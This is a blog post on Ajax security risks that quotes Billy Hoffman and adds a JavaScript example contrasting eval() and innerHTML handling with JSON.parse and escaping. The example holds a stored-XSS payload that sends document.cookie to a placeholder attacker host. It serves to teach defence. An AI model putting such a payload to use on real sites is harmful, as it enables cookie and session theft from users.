
Ajax Security Risks

Billy Hoffman of SPI Dynamics is speaking out about the risks of JavaScript and Ajax and was quoted in a recent InfoWorld article. One of the most telling quotes about the state of Web application security from Hoffman is:

"In the last two years, we've seen JavaScript go from stealing cookies to doing key-logging, screen-scraping and all sorts of phishing attacks," Hoffman said. "JavaScript used to be something that was more annoying than anything, but now it's being used in port scanning, to create self-propagating malware and to steal browser histories."

JavaScript has long been the vehicle for attacks on browser users, but newer development techniques such as Ajax, and the tools that support them, move more application logic and more server-supplied data into the browser. That widens the opportunities for introducing these vulnerabilities into your sites, because every response a page fetches and renders is another place untrusted data can reach a script-executing sink.
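
To make the point concrete, the following is an added example, not code from the original post or from SPI Dynamics. It places a typical early-Ajax response handler beside a hardened one. The two habits shown, eval() on a response body and innerHTML on data the server relayed, are exactly what turns a stored profile field into the cookie theft Hoffman describes. The response bodies, the attacker host name and the tiny element stand-in are all constructed for the example so it runs under Node without a browser.

```javascript
// Added example (not from the original post): vulnerable vs. hardened
// handling of an Ajax response. All inputs below are constructed.

// Stand-in for a DOM element. In a real browser, innerHTML is parsed as
// markup (and any event handler in it runs); here it just stores the string
// so we can inspect what would have been handed to the parser.
function makeElement() {
  return { innerHTML: "" };
}

// Constructed JSON response. The "bio" field was stored earlier by an
// attacker and carries a cookie-stealing payload (attacker.invalid is a
// placeholder host).
const HOSTILE_JSON =
  '{"user":"mallory","bio":"<img src=x onerror=\\"(new Image).src=\'http://attacker.invalid/?c=\'+document.cookie\\">"}';

// Constructed response that is valid JavaScript but NOT valid JSON.
// eval() runs the embedded assignment; JSON.parse rejects the body.
const NOT_JSON = '{"user":"mallory","bio":(globalThis.evalRan = true, "hi")}';

// --- vulnerable Ajax-era handler ---------------------------------------

function parseUnsafe(responseText) {
  // Executes whatever the body contains; anything that is not pure data
  // (a compromised or spoofed response, an injected script) runs here.
  return eval("(" + responseText + ")");
}

function renderUnsafe(el, data) {
  // Markup inside data is interpreted by the browser: a stored XSS sink.
  el.innerHTML = "<b>" + data.user + "</b>: " + data.bio;
  return el.innerHTML;
}

// --- hardened handler ---------------------------------------------------

function parseSafe(responseText) {
  // JSON.parse accepts data only and throws on anything executable.
  return JSON.parse(responseText);
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(el, data) {
  // Every untrusted value is escaped before it is placed into markup. In a
  // real DOM, textContent or createTextNode on the untrusted parts is the
  // simpler equivalent; escaping is shown so the result is visible here.
  el.innerHTML = "<b>" + escapeHtml(data.user) + "</b>: " + escapeHtml(data.bio);
  return el.innerHTML;
}

// Runs both pipelines on the hostile body and returns what each would have
// handed to the browser's HTML parser.
function demo() {
  const unsafe = renderUnsafe(makeElement(), parseUnsafe(HOSTILE_JSON));
  const safe = renderSafe(makeElement(), parseSafe(HOSTILE_JSON));
  return { unsafe, safe };
}

console.log(demo());
```

The unsafe branch hands the raw `<img ... onerror=...>` tag to the parser, so the handler fires and the cookie leaves the site; the safe branch renders the same field as visible text. JSON.parse is native in every browser that implements ES5; Ajax code written against older browsers needs a JSON library that validates before it evaluates rather than a bare eval().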

Hoffman goes on to say:

The only way to improve the situation is for site operators to undertake more comprehensive efforts to rid their pages of the problems, said Hoffman, and for them to slow down adoption of newer languages, such as AJAX, which appear to outstrip many Web developers' security skills.

For more on Ajax security, see Ajax Security Basics.


Dan Sullivan's Bio:

Dan Sullivan is a systems architect with 20 years of IT experience that includes engagements in enterprise security, application design, and systems architecture. His experience includes a broad range of industries, including financial services, manufacturing, government, retail, gas and oil production, power generation, and education. Dan’s security-related project work has ranged from requirements analysis for enterprise information security to designing and implementing security for database applications and enterprise portals. Dan has written about information security and other enterprise information management topics for Business Security Advisor, DM Review, Intelligent Enterprise, and E-Business Advisor. You can contact Dan at: dan_sullivan@realtimepublishers.net